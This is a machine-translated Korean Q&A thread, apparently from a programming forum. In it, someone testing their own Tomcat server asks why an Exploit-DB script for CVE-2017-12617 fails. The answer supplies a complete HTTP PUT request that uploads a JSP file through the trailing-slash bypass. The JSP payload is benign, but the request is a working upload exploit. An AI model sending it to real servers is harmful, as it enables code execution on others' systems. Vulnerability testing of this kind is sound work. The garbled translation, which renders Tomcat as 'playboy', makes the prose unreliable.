2017-10-27 2 views
1

https://lists.apache.org/thread.html/[email protected]%3Cannounce.tomcat.apache.org%3E작업은 바람둥이 취약점에 대한 공격 : JSP 업로드 바이 패스 CVE-2017-12617

나는 바람둥이 6.x에서, 7.x 및 8.x의 서버는 윈도우에서 실행되는 AS 제이 보스의 7.2.x 있습니다. webapps 디렉토리 아래에 웹 애플리케이션을 만들었습니다. $ TOMCAT_HOME/conf/web.xml을 수정하고 readonly 매개 변수를 false로 설정했습니다 (기본적으로 true). 그런 다음 익스플로잇 https://www.exploit-db.com/exploits/42966/ (HTTP PUT을 사용하여 페이로드를 업로드하려고하는 python 스크립트)을 실행했습니다.
파이썬 42966.py -u http://localhost:9292/ExploitTest

내가 바람둥이 8.0.x에서 (리소스를 찾을 수 없습니다)를
1) HTTP 404 개 상태를 얻고,
2) HTTP 400 개 상태 : 나는 다음 명령 줄을 실행 (나쁜 요청) 및
3) HTTP400 상태에서 바람둥이 7.x.

위의 python 익스플로잇을 실행하면 tomcat 서버에 HTTP 201 (새로 생성 된 리소스)이 생성 될 것으로 예상됩니다. 익스플로잇에 어떤 문제가 있습니까? 또는 취약점에 대해 tomcat을 올바르게 설정하지 않았습니까? 서버가 실제로 취약한 지 여부를 확인할 때 사용할 수있는이 취약점에 대한 컬이나 자바 기반 또는 다른 악용 도구가 있습니까?

답변

1

대답은 https://www.peew.pw/blog/2017/10/9/new-vulnerability-same-old-tomcat-cve-2017-12615에 있습니다. 원래 요청은 https://bz.apache.org/bugzilla/show_bug.cgi?id=61542입니다.

나는 링크

이 트릭을 수행
PUT /1.jsp/ HTTP/1.1 
Host: 192.168.3.103:8080 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 
Referer: http://192.168.3.103:8080/examples/ 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2 
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94 
Connection: close 
Content-Length: 26 

<% out.println("hello");%> 

위의 당 POC 요청을 만드는 법 트림 스위트 룸을 사용!